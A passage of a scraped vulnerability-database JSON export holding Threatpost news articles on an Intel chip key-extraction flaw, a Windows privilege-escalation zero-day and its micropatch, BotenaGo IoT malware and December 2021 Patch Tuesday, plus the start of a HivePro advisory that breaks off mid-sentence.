"modified": "2021-11-29T17:47:10", "id": "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "href": "https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/15150632/Intel-chip-bug.png)\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. \u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains unaddressed fully by Microsoft \u2013 but an unofficial micropatch from oPatch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . \u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. \u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/12123900/specops_midroll-promo.jpg)](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. One is the create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttackers that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which that can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T14:21:48", "description": "Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.\n\nThe patch came as part of the computing giant\u2019s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft\u2019s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.\n\nSeven of the bugs addressed are rated critical, six were previously disclosed as zero-days and 60 are considered \u201cimportant.\u201d\n\nThe update brings the total number of CVEs patched by Microsoft this year to 887, which is down 29 percent in volume from a very busy 2020.\n\n## **Zero-Day Exploited in Wild**\n\nThe zero-day ([CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)) is an important-rated spoofing vulnerability in the Windows AppX Installer, which is a utility for side-loading Windows 10 apps, available on the App Store.\n\nKevin Breen, director of cyber-threat research at Immersive Labs, explained that the bug \u201callows an attacker to create a malicious package file and then modify it to look like a legitimate application, and has been used to deliver Emotet malware, which [made a comeback](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) this year.\u201d\n\nBreen warned, \u201cthe patch should mean that packages can no longer be spoofed to appear as valid, but it will not stop attackers from sending links or attachments to these files.\u201d\n\nPrior to its fix today, the bug was seen in multiple attacks associated with Emotet, TrickBot and Bazaloader, according to Satnam Narang, staff research engineer at Tenable.\n\n\u201cTo exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, which would be conducted through a phishing attack,\u201d he explained via email. \u201cOnce exploited, the vulnerability would grant an attacker elevated privileges, particularly when the victim\u2019s account has administrative privileges on the system.\u201d\n\nIf patching isn\u2019t an option, Microsoft has provided some workarounds to protect against the exploitation of this vulnerability.\n\n## **Other Publicly Known Microsoft Vulnerabilities**\n\nIt\u2019s worth noting that Microsoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a privilege-escalation vulnerability in Windows Installer, for which [there\u2019s been an exploit circulating](<https://threatpost.com/attackers-target-windows-installer-bug/176558/>), and, reportedly, active targeting by attackers \u2013 even though Microsoft said it has seen no exploitation.\n\n\u201cThis appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation-of-privilege vulnerability in Windows Installer that was reportedly fixed in November,\u201d Narang said. \u201cHowever, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.\u201d\n\nBreen noted that this kind of vulnerability is highly sought after by attackers looking to move laterally across a network.\n\n\u201cAfter gaining the initial foothold, achieving administrator-level access can allow attackers to disable security tools and deploy additional malware or tools like Mimikatz,\u201d he said. \u201cAlmost all ransomware attacks in the last year employed some form of privilege escalation as a key component of the attack prior to launching ransomware.\u201d\n\nFour other bugs were listed as \u201cpublicly known\u201d but not exploited, all rated important and allowing privilege escalation:\n\n * [CVE-2021-43240](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>), a NTFS Set Short Name\n * [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), a Windows Encrypting File System (EFS)\n * [CVE-2021-43880](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>), Windows Mobile Device Management\n * [CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>), Windows Print Spooler\n\nThe update does not address CVE-2021-24084, an unpatched Windows security vulnerability [disclosed in late November](<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>), which could allow information disclosure and local privilege escalation (LPE).\n\n## **Critical-Rated Microsoft Security Bugs for December**\n\n 1. ### **CVE-2021-43215 in iSNS Server**\n\nThe first critical bug ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)) to cover allows remote code-execution (RCE) on the Internet Storage Name Service (iSNS) server, which enables automated discovery and management of iSCSI devices on a TCP/IP storage network. It rates 9.8 out of 10 on the vulnerability-severity scale.\n\nThe bug can be exploited if an attacker sends a specially crafted request to an affected server, according to Microsoft\u2019s advisory.\n\n\u201cIn other words, if you\u2019re running a storage-area network (SAN) in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually,\u201d said Trend Micro Zero Day Initiative researcher Dustin Childs, in a [Tuesday blog](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). \u201cIf you have a SAN, prioritize testing and deploying this patch.\u201d\n\nBreen concurred that it\u2019s critical to patch quickly if an organization operates iSNS services.\n\n\u201cRemember that this is not a default component, so check this before you bump it up the list,\u201d he said via email. However, \u201cas this protocol is used to facilitate data storage over the network, it would be a high priority target for attackers looking to damage an organization\u2019s ability to recover from attacks like ransomware. These services are also typically trusted from a network perspective \u2013 which is another reason attackers would choose this kind of target.\u201d\n\n 2. ### **CVE-2021-43907 in Visual Studio Code WSL Extension**\n\nAnother 9.8-out-of-10-rated bug is [CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>), an RCE issue in Visual Studio Code WSL Extension that Microsoft said can be exploited by an unauthenticated attacker, with no user interaction. It didn\u2019t provide further details.\n\n\u201cThis impacted component lets users use the Windows Subsystem for Linux (WSL) as a full-time development environment from Visual Studio Code,\u201d Childs explained. \u201cIt allows you to develop in a Linux-based environment, use Linux-specific tool chains and utilities, and run and debug Linux-based applications all from within Windows. This sort of cross-platform functionality is used by many in the DevOps community.\u201d\n\n 3. ### **CVE-2021-43899 \u2013 Microsoft 4K Wireless Display Adapter **\n\nThe third and final 9.8 CVSS-rate bug is [CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>), which also allows RCE on an affected device, if the attacker has a foothold on the same network as the Microsoft 4K Display Adapter. Exploitation is a matter of sending specially crafted packets to the affected device, according to Microsoft.\n\n\u201cPatching this won\u2019t be an easy chore,\u201d Childs said. \u201cTo be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can [they] use the \u2018Update & Security\u2019 section of the app to download the latest firmware to mitigate this bug.\u201d\n\n 4. ### **CVE-2021-43905 in Microsoft Office**\n\nAnother critical RCE bug ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)) exists in the Microsoft Office app; it rates 9.6 on the CVSS vulnerability-severity scale, and Microsoft marked it as \u201cexploitation more likely.\u201d\n\n\u201cVery little is given away in the advisory to identify what the immediate risk is \u2013 it simply states the affected product as \u2018Office App,'\u201d Breen noted. \u201cThis can make it difficult for security teams to prioritize or put mitigations in place if quick patching is not available \u2013 especially when security teams are already tied down with other critical patching.\u201d\n\nHowever, Aleks Haugom, researcher at Automox, said it should be a priority for patching.\n\n\u201cAs a low-complexity vulnerability, an attacker can expect repeated results,\u201d he said in a [Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-on-december-2021-patch-tuesday-release>). \u201cAlthough Microsoft has not disclosed exactly what user interaction is required for the attacker to succeed they have confirmed that the Preview Pane is not an attacker vector. Given that this threat can impact resources beyond the security scope managed by the security authority immediate remediation actions are advised.\u201d\n\n 5. ### **CVE-2021-42310** **in Microsoft Defender for IoT**\n\nOne of 10 issues found in Defender for IoT, this bug ([CVE-2021-42310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42310>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cA password reset request consists of a signed JSON document, a signing certificate, and an intermediate certificate that was used to sign the signing certificate,\u201d explained Childs. \u201cThe intermediate certificate is supposed to chain up to a root CA certificate built into the appliance. Due to a flaw in this process, an attacker can reset someone else\u2019s password. Patching these bugs requires a sysadmin to [take action](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version>) on the device itself.\u201d\n\nThe other nine bugs in the platform include seven other RCE vulnerabilities, one elevation of privilege vulnerability and one data disclosure vulnerability, all rated \u201cimportant.\u201d\n\n 6. ### **CVE-2021-43217 in the Windows Encrypting File System (EFS) **\n\nThis bug ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cAn attacker could cause a buffer overflow that would leading to unauthenticated non-sandboxed code execution, even if the EFS service isn\u2019t running at the time,\u201d Childs explained. \u201cEFS interfaces can trigger a start of the EFS service if it is not running.\u201d\n\nJay Goodman, in the Automox posting, noted that it can be chained with the publicly disclosed elevation of privilege vulnerability in EFS and thus presents a special threat.\n\n\u201cWhile either of these vulnerabilities constitute impactful disclosures that need to be handled quickly, the combination of the two in a near universal service critical to securing and protecting data creates a unique situation,\u201d he said. \u201cAttacks could use the combination of RCE with privilege elevation to quickly deploy, elevate and execute code on a target system with full system rights. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread laterally.\u201d\n\nIn other words: This is a critical pair of vulnerabilities to address as soon as possible to minimize organizational risk.\n\n 7. ### **CVE-2021-43233 in Remote Desktop Client **\n\nThe flaw ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)) allows RCE and rates 7 on the CVSS scale. It\u2019s listed as \u201cexploitation more likely.\u201d\n\n\u201cThis one\u2026would likely require a social engineering or phishing component to be successful,\u201d Breen explained. \u201cA similar vulnerability, [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), was reported and patched in November. While it was also marked as \u2018exploitation more likely,\u2019 thankfully there have been no reports of proof-of-concept code or of it being exploited in the wild, which goes to show how important it is to make your own risk-based approach to prioritizing patches.\u201d\n\nAutomox researcher Gina Geisel emphasized the bug\u2019s high complexity for exploitation.\n\n\u201cTo exploit this vulnerability, an attacker requires control of a server and then must convince users to connect to it, through social engineering, DNS poisoning or using a man-in-the-middle (MITM) technique, as examples,\u201d she said. \u201cAn attacker could also compromise a legitimate server, host malicious code on it, and wait for the user to connect.\u201d\n\n## **Other Microsoft Bugs of Note for December**\n\nChilds also flagged [CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>), an RCE issue in Microsoft SharePoint Server, as a vulnerability to prioritize. It allows an attacker to bypass the restriction against running arbitrary server-side web controls.\n\n\u201cThe vulnerability allows a user to elevate and execute code in the context of the service account,\u201d he explained. \u201cAn attacker would need \u2018Manage Lists\u2019 permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions.\u201d\n\nHe said the issue is similar to the previously patched [CVE-2021-28474](<https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict>), except that the unsafe control \u201cis \u2018smuggled\u2019 in a property of an allowed control.\u201d\n\nOperating system bugs should be prioritized, researchers added.\n\n\u201cThe disclosures include a functional example in the case of the Print Spooler, proof-of-concept for the NTFS and Windows Installer vulnerabilities, so there is some cause to put urgency on the OS updates this month,\u201d Chris Goettl, vice president of product management at Ivanti, told Threatpost.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-14T22:21:35", "type": "threatpost", "title": "Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-28474", "CVE-2021-38666", "CVE-2021-41333", "CVE-2021-41379", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-14T22:21:35", "id": "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "href": "https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-01T05:28:01", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Microsoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf>)\n\nAn improperly patched Windows vulnerability (CVE-2021-24084) can lead to local privilege escalation and information disclosure. The vulnerability was disclosed in October 2020 and even after Microsoft addressed this vulnerability in February 2021\u2019s Patch Tuesday, a researcher was able to exploit the patched vulnerability making it another zero-day made by improper patching.\n\nCVE-2021-24084 was an information disclosure vulnerability in the Windows Mobile Device Management component but later it was discovered that it could be exploited for local privilege escalation that allows an attacker to gain admin privilege and reading arbitrary files even if they don\u2019t have the permissions to do so. All the versions of Windows 10 even after the November patch are affected by this vulnerability.\n\nAfter examining Microsoft's fix, [Abdelhamid Naceri](<https://github.com/klinix5/InstallerFileTakeOver>), the security researcher who discovered this vulnerability, discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability. He also made the proof-of-concept available to the public.\n\nAn unofficial micro patch has been released by 